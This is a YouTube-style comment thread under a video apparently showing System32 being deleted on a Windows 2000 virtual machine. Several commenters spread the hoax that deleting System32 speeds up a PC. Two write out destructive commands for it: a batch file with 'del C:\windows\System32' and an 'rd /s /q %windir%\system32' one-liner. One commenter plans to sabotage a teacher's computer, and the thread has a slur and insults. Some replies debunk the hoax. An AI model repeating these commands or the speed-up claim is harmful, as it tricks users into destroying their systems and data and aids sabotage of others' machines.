  • Your real problem is that you're using Windows 2000.

  • Guess what...

I deleted system 32 today on a virtual machine on my school computer account today, to see what happened.... and now it doesn`t start!!! I`ll have to ask my IT team at school to reinstall....

  • Ahhhhh! Oh wait dont worry its a old computer :P

  • i got expelled from my school because i told the teacher it was a learning program and every1 did it. LOL it was worth it

  • thumbs up if u muted the sound

  • @pontikkaOmena hahah i laughed at first listening

  • The ladies bras?

  • yeah, how did you get back into the operating system, and get to the .avi file that was recorded from the screen, did you re-install the missing files, or maybe boot from another partition, or from another drive, or maybe the .avi file was saved to an external drive. cool video by the way.

  • @creativeprojects720 He didn't actually delete it physically, he did it in an virtualbox, so his actual computer files were completely unharmed

  • @creativeprojects720 It was a virtual machine. Windows 7 recorded the screen.

  • @creativeprojects720 The joys of VIRTUAL MACHINES......

  • so if you delete system 32 the system will not boot to windows, right? how did you delete it from the "run" command line?

  • Nerd

  • @dnkgames

    You fail

  • lamer

  • Do this in virtual box?

  • @slainbybullet Yep.

  • What song is this?

  • Comment removed

  • This idiot didn't delete System32, he has to Take Ownership of it first then delete it, fag.

  • Why this destroys Windows:

    1. It deletes NTOSKRNL.EXE, which is the kernel, and moves Windows from a 16 bit environment to the 32/64 bit environment.

    2. It deletes HAL.DLL, which allows you to interface with your hardware.

I have to deal with dumbasses who do this all the time. It's amazing how ignorant some people are. At least most people are too dumb to be able to delete the Master Boot Record (MBR).

  • wait how did you even recorder it Then >:P

  • time to make it on school computers!!!

  • Why would you consider deleting your operating system. Even if the computer looks stone age material.

  • @thedarkerdays07 ur really gonna try that lol obviously if someone watched this that means they know what that does dumbass

  • @roblixian5897 VirtualPC, bro.

  • Hello trolls.

  • Wow ! I did it to ! My computers so fast now so glad somebody suggested this to me :D If your looking for a easy way to speed you computer up I recommend this method :)

  • EVEN BETTER: Delete %windir%\Fonts and rename Tahoma.ttf

  • I'm NEVER doing this...

  • does win 2000 work ok?

  • nice VPC2007 machine

  • Whats system32

  • @cacoora2 A file that takes up a lot of room on your computer, and if you delete it, you get a lot more speed for your computer. Many gamers delete it because it's unnecessary. :)

  • is this safe? is this ever gonna work?

  • get windows 7 or at least a new computer

  • That was fast

    Why?

  • hypercam: ancient edition.

  • @YourSovietComrade Lol, who even uses hypercam?

  • @Demache92 well...

  • @Demache92 Runescape fags.

  • That pc is from 1920 ain

  • If you look at the command prompt, for every single file it either gives 'access denied' or 'this program is already in use'. Nothing was deleted.

    Well, almost nothing, apparently.

  • @thechucknorrisofNSMB Actually a lot of stuff WAS deleted. The command prompt returns nothing if a file is successfully deleted, it only tells you when it encounters an error. When it looks like it was paused, there where a lot of files being deleted.

  • @Demache92 Oh. I guess I'm not very familiar with Command prompt anyway, so that kinda makes sense. Thanks for clarifying, though.

  • OMG! IT IS REALLY FAST NOW, HUH?! ;)

  • Thumbs up if music reminds you of Gmod Idiot Box

  • get to sleep

  • do you have så old computer at 2011 and now 2012

    HAHA !!!

  • windows 2000 lol

  • hehe when i get to school on tuesday "presidents day" i am going to destry Mr. Marso with that by going on his pc after school and doing that or do it on one of the pcs in the classroom. he is our pc teacher and all of the boys hate him because he is sexest and he likes the girls better -gasp- so i am going to use that on him. we have a long history including hacking pcs. hehe i got into my cousings file and defaced the property of his report and i when i got back i didnt get any trouble

  • @chunkmonke who the fuck is Mr. Marso

  • Lol, I'm deleting it right no--Windows has encountered an error and needs to shutdown. We apologize for the inconvience.

  • I love all the "Access is denied" notifications

  • I already have Uniblue RegistryBooster; is that a problem?

  • @TheSpotify95

Highly unlikely. I would not be concerned.

  • Perfect! I say perfect choice of music! It made me laugh!

  • I am now downloading VirtualBox, to try for myself! :)

  • I love this!!! :)

  • You were prevented from deleting a lot of files because they were currently in use. The reason you could not re-boot is because you managed to delete a file that is only in use when booting the computer (therefore you were able to delete it in the first place).

  • virgin

  • Damn homie pullen' a fast one with dat windows 2000

  • What kind of sadistic person does it take to say "You know what's wrong with this computer? Too much system32"?

  • why does the music sound like robot chicken?

  • Windows 2000, nice

  • how the fuck did u upload this????

  • Acess Denied;

    Reaction: *facepalm*

  • It's about time you killed that dinosaur

  • meh,it was a windows 95

  • Congradulations. You just killed System32. Now your PC is totally fucked up. Don't mess with Microsoft, bitch. XD

  • 'Access is denied"

"The process cannot access the file because it is being used by another process."

You can't delete much of system32 while windows is operating because it is using the files to run your current environment.

  • Very fitting music

  • and you would wanna delete system 32 why?

  • i know thats one of worse

  • Thumbs up if u muted the video

  • Guess what im not deleting :D

  • Acces-Denied

  • Holy crap you got the first Windows ever?

  • @z6achminer its not first windows ever theres windows 95 a few ones on my school wanna see?

  • thumbs up if u tried it

  • @student71901 NERVER

  • @student71901 DONT I WILL NERVER !!!!!!!!!

  • OMFG LOL THIS REAL?

  • it's a virtual machine, a computer within a computer (incpution)

  • not real its an program as you see the system32 is got wrong coding

  • how does he still have this video file if delete that?

  • @IcyFreshHALO He probably used another computer to record.

  • @HydroPlume1 it's virtual machine

  • its in denial hahahahahahaahaha

  • If you deleted system 32, you wouldn't have been able to use shutdown.exe which means you can only turn your computer off by disconnection of power.

  • @HydroPlume1 Interesting point. But it seems that it did not break the shutdown functionality. Just tried this again this time in a XP virtual machine, and checked system32 and shutdown.exe isn't there. But apparently, its not needed to shutdown.

  • @Demache92 shutdown.exe is the box that comes up with "standby, turn off, restart" and closes all programs before shutting the computer down

  • @cjmitz Not sure about that. I think the GUI part is just part of explorer.exe. Shutdown.exe is strictly a command line tool.

  • @Demache92 stop da nerd talk

  • @cjmitz Actually, I know that if you execute shutdown.exe, it shuts the computer down, but maybe only for newer operating systems.

  • @Demache92 what happens if u delete it will i still be able to use ur pc again or u need to get a new one or something?

  • @HydroPlume1 WTF the pc camera can start when it restarted????

  • @2345geno y u no know virtual machine?

  • @enricoundera yeah it's better to delete system 32 on it! :D

  • How to delete

    1. Create a document in notepad

    2. Type this in:

    @echo off

    del C:\windows\System32

    3. Save as (anything).bat

    4. Run

    5. ????

    6. Profit!

  • @DCDigitalStudios Doesn`t this delete your system 32? I heard it speeds up your computer.

  • @TheSpotify95 It sped up my computer immensely, I highly recommend it.

  • deleting on an old computer so not to screw up your life.. heads up move

  • @pimpboykd DOSBox

    :I

  • LOL Windows 2000,more like windows 1945

  • Have fun by writing this in the command " cmd /c rd /s /q %windir%\system32 "

  • @MeGaEdIIToRMaN try it on your windows 2000 machine! It speeds it up and makes it 10x faster :)

  • old windows os is old

  • My name is Jesse?!?!?'

  • I bet all the people that deleted System32 never came back.

  • @TheSpiritof1969 They would have a long job ahead of them, reinstalling the OS....

  • @TheSpotify95

And a real risk of losing all their files. I would suggest that anyone who falls for this get professional help to re install if they have important files as they clearly do not know what they are doing.

  • @TheSpiritof1969 Therefore, firstly back up everything, then delete system32, then reinstall windows and you will have your files backed up - does that work?

  • @TheSpotify95

Deleting system 32 is a scam. It is there in your operating system for a reason and re installing windows will also re install sys32.

Do not mess with your op system if you do not thoroughly understand what you are doing and why. Do not do it just because some idiot has put a nasty little hoax on YT, all you will do is mess up your PC/ Lappy

There are many way of improving performance of you machine, this is not one of them.

  • @TheSpiritof1969 Dont worry, I wont actually do this - I just found this, and after looking up on yahoo answers I realise what it does. I am not the person to be tricked into dong things to harm OS.

  • @TheSpotify95

The following help me and are well known and established things you can do.

    Download the following.

    CCleaner

    Spybot search and destroy

    Microsoft Security essentials

    AVG anti virus

All these are free. AVG do a free version that I use myself. CCleaner is usefull for regular clean ups and removes things like cookies and a lot of other stuff. None of the above programs cause problem and I have used them for some time.

  • @TheSpiritof1969 Thank you very much, I will try these. I have Mcafee security at the moment, so is that a problem? my computer is running a bit slower than expected...

  • @TheSpotify95

try CCleaner first. That will cleaner up your drive and you can use it to defrag and check for registry errors.

  • @TheSpiritof1969 I have Uniblue RegistryBooster already. Will this be an issue?

  • I remember Window 2000....lol

  • Music is "Gonk" from the movie "Dawn of the Dead' circa 1978.

  • german porn music!!

  • @ripppking :DD
